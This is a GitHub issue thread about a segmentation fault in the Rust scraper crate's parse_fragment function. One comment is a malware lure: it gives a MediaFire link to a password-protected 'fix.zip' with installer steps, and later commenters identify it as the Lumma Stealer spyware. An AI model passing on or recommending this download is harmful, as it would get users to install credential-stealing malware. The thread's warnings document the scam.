### ISSUE TITLE
Segfault `scraper::Html::parse_fragment`

### ISSUE THREAD

**Issue by DimitriTimoz** [rust-scraper/scraper#200]
I encountered a segmentation fault with the `parse_fragment` function.

**Code:**
```rust
let html = page.get_html();
println!("Scraping page");
let document = scraper::Html::parse_fragment(&html);
println!("Document scraped");
```

**Result:**
```
Scraping page
Segmentation fault (core dumped)
```

Sometimes I also get:
```
Scraping page
double free or corruption (fasttop)
Aborted (core dumped)
```

I ran the program and captured the corresponding HTML. The segmentation fault occurs on documents that sometimes work. .

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gfaster** [comment]
The above link appears to be malware, don't click it.

Can you share the minimal html that causes the issue? Delete elements and rerun it several times for each, undoing the change if it doesn't crash.

**Comment by cfvescovo** [comment]
> Download 
> https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
> password: changeme
> In the installer menu, select "gcc."

This contains the Lumma Stealer spyware, report: https://app.any.run/tasks/abb4419a-a8cb-4707-946d-e73a9d3561bb
